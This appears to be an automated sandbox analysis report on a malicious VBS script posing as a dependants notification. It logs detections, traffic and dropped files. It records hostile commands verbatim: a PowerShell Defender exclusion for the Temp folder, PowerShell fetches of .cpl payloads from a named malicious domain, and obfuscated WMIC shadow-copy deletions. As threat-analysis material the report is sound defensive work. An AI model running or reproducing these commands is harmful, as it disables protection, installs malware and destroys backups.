ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', ProcessId: 7804, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5900, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://kiltone.top/stelin/Gosjeufon.cpl	Avira URL Cloud: Label: malware
Source: https://kiltone.top/stelin/rwcla.cpl	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\fjeljies.cpl	ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Source: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	HTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/downloaded.pdf	HTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/downloaded.pdf	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.9:49725 version: TLS 1.2

Source:	Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.dr
Source:	Binary string: Z:\lderd\Release\lderd.pdb source: fjeljies.cpl.13.dr
Source:	Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.dr

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\replacementmanifests\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\migration\wtr\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File opened: D:\sources\replacementmanifests\hwvid-migration-2\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Child: C:\Windows\System32\rundll32.exe			Jump to behavior

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: TELE-ASTeleAsiaLimitedHK TELE-ASTeleAsiaLimitedHK

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63

Source: global traffic	HTTP traffic detected: GET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1Host: www.oldmutual.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /stelin/rwcla.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.oldmutual.co.zaConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf HTTP/1.1Host: www.oldmutual.co.zaConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive

Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.oldmutual.co.za
Source: global traffic	DNS traffic detected: DNS query: kiltone.top
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 8659Connection: closeDate: Thu, 19 Dec 2024 05:18:11 GMTLast-Modified: Wed, 18 Dec 2024 15:03:19 GMTx-amz-server-side-encryption: AES256Accept-Ranges: bytesServer: AmazonS3Content-Security-Policy: default-src 'self'; font-src 'self' data: https://use.typekit.net https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://tagmanager.google.com https://fonts.googleapis.com https://fonts.gstatic.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://services.ominsure.co.za https://embed.tawk.to https://salesiq.zoho.com https://css.zohostatic.com https://css.zohocdn.com/* https://css.zohocdn.com/salesiq/styles/fonts/cw/puvi/* https://css.zohocdn.com/salesiq/styles/fonts/cw/* https://css.zohocdn.com; style-src 'self' 'unsafe-inline' https://tagmanager.google.com https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://fonts.googleapis.com https://optimize.google.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://services.ominsure.co.za https://www.gstatic.com https://embed.tawk.to https://cdn.jsdelivr.net/* https://css.zohocdn.com https://css.zohostatic.com https://cdn.jsdelivr.net/* https://static.zohocdn.com; img-src 'self' data: https://p.typekit.net https://tawk.link https://tawk.link/* https://test-dms.oldmutual.com.gh https://test.interpayafrica.com https://test-dms.oldmutual.com.gh/* https://test.interpayafrica.com/* https://t.co https://www.google.co.za https://www.google.com https://www.gstatic.com https://ssl.gstatic.com https://maps.gstatic.com https://maps.googleapis.com https://eu-images.contentstack.com https://images.contentstack.io https://i.ytimg.com https://www.google-analytics.com https://www.facebook.com https://stats.g.doubleclick.net https://px.ads.linkedin.com https://p.adsymptotic.com https://lh3.googleusercontent.com https://www.brighttalk.com https://www.pages06.net https://vds.issproxy.com https://vds.issgovernance.com https://ir.tools.investis.com https://otp.tools.investis.com https://irs.tools.investis.com https://optimize.google.com https://ws.sessioncam.com https://services.ominsure.co.za https://*.fls.doubleclick.net https://sp.analytics.yahoo.com https://embed.tawk.to https://embed.tawk.to https://salesiq.zoho.com https://salesiq.zoho https://salesiq.zohopublic.com https://css.zohostatic.com https://css.zohostatic.com/* https://css.zohocdn.com https://analytics.twitter.com/1/i/* https://geo-tracker.trinadsp.co.za/* https://s2s.oldmutual.co.za https://track.adform.

Source: cert9.db.32.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.32.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cert9.db.32.dr	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: svchost.exe, 0000000E.00000002.2703518448.000002794C600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: cert9.db.32.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.32.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.32.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.32.dr	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: svchost.exe, 0000000E.00000002.2704121247.000002794C6E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/
Source: qmgr.db.14.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.14.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.14.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.14.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000E.00000002.2701311776.00000279472B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2702160116.0000027947B02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2703895247.000002794C666000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2703657573.000002794C62C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2123615600.000002794C812000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2704087086.000002794C6D5000.00000004.00000020.00020000.00000000.sdmp, edb.log.14.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/
Source: qmgr.db.14.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.14.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000000E.00000002.2703895247.000002794C68D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: edb.log.14.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: cert9.db.32.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.32.dr	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: cert9.db.32.dr	String found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.32.dr	String found in binary or memory: http://x1.i.lencr.org/0
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://account.bellmedia.c
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://allegro.pl/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://bugzilla.mo
Source: prefs.js.32.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: rundll32.exe, 00000015.00000002.2161641994.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, fjeljies.cpl.13.dr	String found in binary or memory: https://digify.com/a/#/access/login
Source: fjeljies.cpl.13.dr	String found in binary or memory: https://digify.com/a/#/access/logincmd
Source: edb.log.14.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 0000000E.00000003.1487710421.000002794C810000.00000004.00000800.00020000.00000000.sdmp, edb.log.14.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: extensions.json.32.dr	String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: prefs.js.32.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: fjeljies.cpl.13.dr	String found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl
Source: cmd.exe, 0000001B.00000002.1770145202.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
Source: wscript.exe, 00000000.00000002.1574200760.0000011AB8065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1575418983.0000011AB9DF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kiltone.top/stelin/rwcla.
Source: wscript.exe, 00000000.00000002.1573963489.0000011AB7E94000.00000004.00000020.00020000.00000000.sdmp, NOTIFICATION_OF_DEPENDANTS.vbs	String found in binary or memory: https://kiltone.top/stelin/rwcla.cpl
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://login.live.com
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://login.microsoftonline.com
Source: extensions.json.32.dr	String found in binary or memory: https://screenshots.firefox.com/
Source: places.sqlite.32.dr	String found in binary or memory: https://support.mozilla.org
Source: places.sqlite.32.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: favicons.sqlite.32.dr	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: places.sqlite.32.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://twitter.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://weibo.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.aliexpress.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.amazon.ca/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.amazon.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.amazon.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.amazon.de/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.amazon.fr/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.avito.ru/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.baidu.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.bbc.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.ctrip.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.ebay.co.uk/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.ebay.de/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.google.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.google.com/complete/
Source: data.safe.bin.32.dr	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=&
Source: data.safe.bin.32.dr	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=&metrics#search.engine.default.verified
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.ifeng.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.iqiyi.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.leboncoin.fr/
Source: places.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/
Source: favicons.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/about/
Source: places.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: favicons.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/contribute/
Source: places.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: favicons.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: places.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: favicons.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: favicons.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: places.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: places.sqlite.32.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.msn.com
Source: chromecache_584.15.dr	String found in binary or memory: https://www.oldmutual.co.za/news/internet-explorer-support
Source: wscript.exe, wscript.exe, 00000000.00000002.1574200760.0000011AB8065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1575418983.0000011AB9DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1573963489.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1572415857.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.oldmutual.co.za/v3/assets/blt0
Source: wscript.exe, 00000000.00000003.1572415857.0000011AB7EBA000.00000004.00000020.00020000.00000000.sdmp, NOTIFICATION_OF_DEPENDANTS.vbs	String found in binary or memory: https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.olx.pl/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.reddit.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.wykop.pl/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.youtube.com/
Source: 3870112724rsegmnoittet-es.sqlite.32.dr	String found in binary or memory: https://www.zhihu.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: unknown	HTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.9:49725 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Deletes shadow drive data (may be related to ransomware)

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Process created: C:\Windows\System32\wbem\WMIC.exe c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
